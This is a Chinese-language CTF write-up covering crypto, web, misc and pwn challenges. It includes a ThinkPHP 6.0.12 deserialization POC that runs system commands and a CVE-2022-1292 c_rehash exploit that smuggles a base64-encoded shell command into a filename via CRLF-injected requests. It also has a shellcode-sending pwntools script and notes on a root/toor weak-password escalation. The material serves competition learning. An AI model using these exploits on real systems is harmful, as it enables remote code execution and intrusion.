前言
不愧是CTF高考!每次打都好累啊!最后CTF88 + 理论1003 -> 156 🤣🤣🤣
Crypto
签到电台
根据提示“粥市安全到达了”所对应的7个电码1732 2514 1344 0356 0451 6671 0055,以及密码本前7*4个数字,1217 8895 2785 4160 1813 4846 9113,提示中的模十规律是加不进位,计算出加密后的电码2949 0309 3029 4416 1264 0417 9168,构造/send?msg=2949030930294416126404179168发送得到flag
基于挑战码的双向认证1、2
非预期,直接grep就能得到两题的flag
基于挑战码的双向认证3
依旧是非预期,弱密码root/toor提权,老地方找到flag
PS:有点迷的是这个grep出来的flag是什么呢?
(搞的我以为修复了,直到看见一堆解了才想是不是还是非预期呢😒
ISO9798
from hashlib import *
import string
from pwn import *
p=remote("47.93.176.13",32892)
context.log_level='debug'
p.recvuntil('sha256(XXXX+')
end=p.recv(16).decode()
p.recvuntil(') == ')
sha=p.recvuntil('\n')[:-1].decode()
def proof_of_work(end,sha):
alp=string.ascii_letters+string.digits
for i in alp:
for ii in alp:
for iii in alp:
for iiii in alp:
s=(i+ii+iii+iiii+end).encode()
if sha256(s).hexdigest()==sha:
return i+ii+iii+iiii
xxxx=proof_of_work(end,sha)
p.recvuntil('Give me XXXX: ')
p.sendline(xxxx)
p.recvuntil('> ')
p.sendline('0')
p.recvuntil('Encrypt(rA||rB||B, k) (in hex) is ')
hhh=p.recvuntil('\n')[:-1].decode()
print(hhh)
s1=hhh[:32]
s2=hhh[32:64]
p.recvuntil('> ')
p.sendline(s2+s1)
p.recvall()Web
Ezpop
参考文章:https://m.freebuf.com/vuls/321546.html
ThinkPHP6.0.12LTS反序列漏洞,有源码泄露,找到路由:?s=index/test
poc如下
<?php
namespace think{
abstract class Model{
private $lazySave = false;
private $data = [];
private $exists = false;
protected $table;
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = false;
function __construct($obj = ''){
$this->lazySave = True;
$this->data = ['whoami' => ['cat /flag.txt']];
$this->exists = True;
$this->table = $obj;
$this->withAttr = ['whoami' => ['system']];
$this->json = ['whoami',['whoami']];
$this->jsonAssoc = True;
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
}
}
namespace{
echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
online_crt
首先源码泄露,根据源码可知该处访问到go
@app.route('/proxy', methods=['GET'])
def proxy():
uri = request.form.get("uri", "/")
client = socket.socket()
client.connect(('localhost', 8887))
msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
'''
client.send(msg.encode())
data = client.recv(2048)
client.close()
return data.decode()
app.run(host="0.0.0.0", port=8888)而go这里核心代码在于host如何伪造,伪造成功之后即可进行文件名修改
if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
err := os.Rename(staticPath+oldname, staticPath+newname)
if err != nil {
return
}
c.String(200, newname)
return
}
c.String(200, "no")通过审计上面的代码可知数据包我们可以通过换行符进行多次访问。
名字修改后回到createlink路由发现执行命令c_rehash,该命令存在cve:CVE-2022-1292
c_rehash static/crt/ && ls static/crt/因网上无公开exp,所以通过官网公布的提交可找到删除部分:
@@ -161,10 +178,12 @@ sub check_file {
sub link_hash_cert { sub link_hash_cert {
my $fname = $_[0]; my $fname = $_[0];
$fname =~ s/\"/\\\"/g; my ($hash, $fprint) = compute_hash($openssl, "x509", $x509hash,
my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`; "-fingerprint", "-noout",
"-in", $fname);
chomp $hash; chomp $hash;
chomp $fprint; chomp $fprint;
return if !$hash;
$fprint =~ s/^.*=//; $fprint =~ s/^.*=//;
$fprint =~ tr/://d; $fprint =~ tr/://d;
my $suffix = 0; my $suffix = 0;
@@ -202,10 +221,12 @@ sub link_hash_cert {
sub link_hash_crl { sub link_hash_crl {
my $fname = $_[0]; my $fname = $_[0];
$fname =~ s/'/'\\''/g; my ($hash, $fprint) = compute_hash($openssl, "crl", $crlhash,
my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`; "-fingerprint", "-noout",
"-in", $fname);
chomp $hash;修改完之后将这部分代码删除了,也就是说问题出在这里
通过审计该文件,可知当选择c_rehash指令对文件夹进行计算时会计算所有名字中带有crt/pem等文件的哈希,命令如下:
`"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`; 那么该漏洞问题就出现在$fname可控的情况,使用双引号闭合前面之后即可达成任意代码执行。
结合题目,也就是说我们只需在题目利用go的功能修改文件名为: 1.crt"||cat /flag >flag.txt " 即可
exp如下:
uri=/admin/renam%25%36%35?oldname=[getcrt得到的文件名].crt%26newname=1.crt%2522%257C%257Cecho%2520Y2F0IC9mbGFnID5mbGFnLnR4dA%253D%253D%257Cbase64%2520-d%257Cbash%2526%2526echo%2522%20HTTP/1.1%0d%0aHost:%20admin%0d%0aConnection:close%0d%0a%0d%0a访问/createlink路由,接着访问static/crt/flag.txt 即可得到flag
Misc
ez_usb
两个键盘设备,分别提取流量,得到一个压缩包和一个压缩包密码,进而得到flag
[-] Unknow Key : 04
[-] Unknow Key : 04
[-] Unknow Key : 01
[-] Unknow Key : 01
[+] Found : 526172211a0700<CAP>c<CAP>f907300000d00000000000000c4527424943500300000002<CAP>a000000<CAP>02b9f9b0530778b5541d33080020000000666c61672<CAP>e<CAP>747874<CAP>b9b<CAP>a013242f3a<CAP>fc<CAP>000b092c229d6e994167c05<CAP>a7<CAP>8708b271f<CAP>fc<CAP>042ae3d251e65536<CAP>f9a<CAP>da87c77406b67d0<CAP>e6316684766<CAP>a86e844d<CAP>c81aa2<CAP>c72c71348d10c4<CAP>c<DEL>3d7b<CAP>00400700
Running as user "root" and group "root". This could be dangerous.
[+] Found : 35c535765e50074a
everlasting_night
首先lsb,在Alpha2通道发现有竖立着东西
于是使用使用clockpixel得到了一个加密的压缩包
然后压缩包密码在图片最后面的字符串经过md5解密后得到
最后得到一张图片通过gimp打开调一下宽度得到flag
问卷调查
填问卷即可得到flag
babydisk
首先取证大师自动取证提取出一个加密文件和一个音频
接着用kali自带的暴力破解脚本deepsound2john.py解出密码:feedback
通过deepsound打开wav得到key.txt
然后就可以用Veracrypt加载那个加密文件得到一个压缩包,打开是破损了的
根据压缩包名字提示螺旋,直接搬运Mumuzi的exp如下
def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left < right and up < down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
f = open('spiral.zip','rb').read()
s = function(87)
# print(s)
s = sum(s,[])
#print(s)
f1 = open('fla.zip','wb')
arr = [0]*7569
# print(arr)
for i in range(len(s)):
arr[i] = f[s[i]-1]
#print(arr)
# print(arr)
for i in arr:
print(hex(i)[2:].zfill(2),end='')进而得到如下图片
最后接着螺旋得到flag:flag{701fa9fe-63f5-410b-93d4-119f96965be6}
Pwn
login-nomal
首先用opt选择1,然后msg来实现指针置1,接着我们就在case 2有漏洞,用opt2来选择case2,在用msg写入shellcode
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./login')
DEBUG = 0
if DEBUG:
libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/libc-2.33.so")
ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/ld-2.33.so")
p = process(argv=[ld.path, elf.path], env={"LD_PRELOAD": libc.path})
# p = process('./login')
else:
ip = '47.93.176.91'
port = 35204
# libc = ELF("./libc.so.6")
p = remote(ip, port)
def debug():
gdb.attach(p, "b main")
# gdb.attach(p, "b *$rebase(0x)")
p.recvuntil(">>> ")
p.send("opt:1\nmsg:ro0ta\n\r\r\n")
p.recvuntil(">>> ")
# debug()
p.send(
"opt:2\nmsg:Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070ta\n\r\r\n")
p.interactive()
付款码 最后一次更新于2022-05-30
yyds|´・ω・)ノ
By 1 at May 30th, 2022 at 10:46 am.